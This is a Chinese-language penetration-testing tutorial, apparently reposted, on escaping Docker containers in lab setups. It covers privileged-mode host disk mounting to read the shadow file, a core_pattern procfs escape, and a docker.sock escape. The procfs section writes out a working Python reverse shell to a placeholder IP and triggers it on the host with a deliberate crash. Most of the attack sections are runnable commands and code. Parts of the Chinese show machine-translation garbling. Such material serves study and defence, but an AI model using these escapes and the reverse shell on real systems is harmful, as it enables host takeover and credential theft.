目次
云原生-Docker安全-容器逃逸&特权模式
云原生-Docker安全-容器逃逸&挂载Procfs
云原生-Docker安全-容器逃逸&挂载Socket
云原生-Docker安全-容器逃逸条件&权限高低
高权限-Web入口到Docker逃逸(java)特权模式逃逸
低权限-Web入口到Docker逃逸(PHP)特权模式逃逸
知识点:
1、云原生-Docker安全-容器逃逸&特权模式
2、云原生-Docker安全-容器逃逸&挂载Procfs
3、云原生-Docker安全-容器逃逸&挂载Socket
4、云原生-Docker安全-容器逃逸条件&权限高低
1、Docker是干嘛的?
一个容器技术,类似于VM捏造机,别人情况封装好打包成一个镜像,使用docker技术就能快速把这个镜像情况还原出来。
2、Docker对于渗出测试影响?
攻击者攻击捏造空间磁盘,拿到最高权限也是捏造空间的权限,而不是真实物理情况的权限
3、前渗出-判断是否在容器中
前提:拿到权限
https://blog.csdn.net/qq_23936389/article/details/131486643
方式一:查询cgroup信息
最简朴精准的方式就是查询体系进程的cgroup信息,通过响应的内容可以识别当前进程所处的运行情况,就可以知道是在捏造机、docker还是kubepods里。
cat /proc/1/cgroup
docker 情况下:
K8s情况下:
方式二:查抄/.dockerenv文件
通过判断根目次下的 .dockerenv文件是否存在,可以简朴的识别docker情况。
K8s&docker情况下:
ls -alh /.dockerenv
可以找到文件。
方式三:检察端口运行情况
netstat -anpt
4、后渗出-三种安全容器逃逸
- 特权模式启动导致(不安全启动,适用于java jsp高权限入口无需提权 低权限入口还要提权才气逃逸)
- 危险挂载启动导致(危险启动,适用于java jsp高权限入口无需提权 低权限入口还要提权才气逃逸)
- docker自身版本毛病&体系内核毛病(软件版本毛病和体系毛病 高低权限都可用)
参考地址:https://wiki.teamssix.com/CloudNative/
云原生-Docker安全-容器逃逸&特权模式
参考地址:https://wiki.teamssix.com/CloudNative/Docker/docker-privileged-escape.html
1、以特权模式启动靶场
- docker run --rm --privileged=true -it alpine
2、检测是否是docker情况
- cat /proc/1/cgroup | grep -qi docker && echo "Is Docker" || echo "Not Docker"
3、判断是否是特权模式
- cat /proc/self/status | grep CapEff
或
4、检察目次
5、特权模式逃逸
- mkdir /test && mount /dev/sda1 /test
尝试访问宿主机 shadow 文件,可以看到正常访问
云原生-Docker安全-容器逃逸&挂载Procfs
参考地址:https://wiki.teamssix.com/CloudNative/Docker/docker-procfs-escape.html
1、启动情况
- docker run -it -v /proc/sys/kernel/core_pattern:/host/proc/sys/kernel/core_pattern ubuntu
2、检测情况
- find / -name core_pattern
3、查找路径(容器在真实磁盘的绝对路径)
- cat /proc/mounts | grep workdir
4、写入文件
- cat >/tmp/.x.py << EOF
- #!/usr/bin/python
- import os
- import pty
- import socket
- lhost = "xx.xx.xx.xx" //反弹IP
- lport = xxxx //反弹端口
- def main():
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.connect((lhost, lport))
- os.dup2(s.fileno(), 0)
- os.dup2(s.fileno(), 1)
- os.dup2(s.fileno(), 2)
- os.putenv("HISTFILE", '/dev/null')
- pty.spawn("/bin/bash")
- os.remove('/tmp/.x.py')
- s.close()
- if __name__ == "__main__":
- main()
- EOF
- echo -e "|/var/lib/docker/overlay2/4aac278b06d86b0d7b6efa4640368820c8c16f1da8662997ec1845f3cc69ccee/merged/tmp/.x.py \rcore " > /host/proc/sys/kernel/core_pattern
- //这里的路径要替换为workdir的绝对路径
- cat >/tmp/x.c << EOF
- #include <stdio.h>
- int main(void)
- {
- int *a = NULL;
- *a = 1;
- return 0;
- }
- EOF
- cd /tmp
- gcc x.c -o x //编译c文件
- apt-get update -y && apt-get install gcc -y
- //实战中不推荐安装gcc环境,可以在linux上编译好后上传到容器中执行就行
5、实验文件:
vps上监听即可
云原生-Docker安全-容器逃逸&挂载Socket
参考地址:https://wiki.teamssix.com/CloudNative/Docker/docker-socket-escape.html
1、启动靶场
- docker run -itd --name with_docker_sock -v /var/run/docker.sock:/var/run/docker.sock ubuntu
2、进入情况
- docker exec -it with_docker_sock /bin/bash
3、检测情况
- ls -lah /var/run/docker.sock
4、挂载逃逸
- apt-get update
- apt-get install curl
- curl -fsSL https://get.docker.com/ | sh
- docker run -it -v /:/host ubuntu /bin/bash
云原生-Docker安全-容器逃逸条件&权限高低
模拟真实场景:
高权限-Web入口到Docker逃逸(java)特权模式逃逸
- docker run --rm --privileged=true -it -p 8888:8080 vulfocus/shiro-721
低权限-Web入口到Docker逃逸(PHP)特权模式逃逸
- docker run --rm --privileged=true -it -p 8080:80 sagikazarmark/dvwa
入口假如是低权限的话是没法用特权模式和危险挂载去逃逸的,但是可以利用体系毛病或者docker自身毛病去逃逸。
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 | 
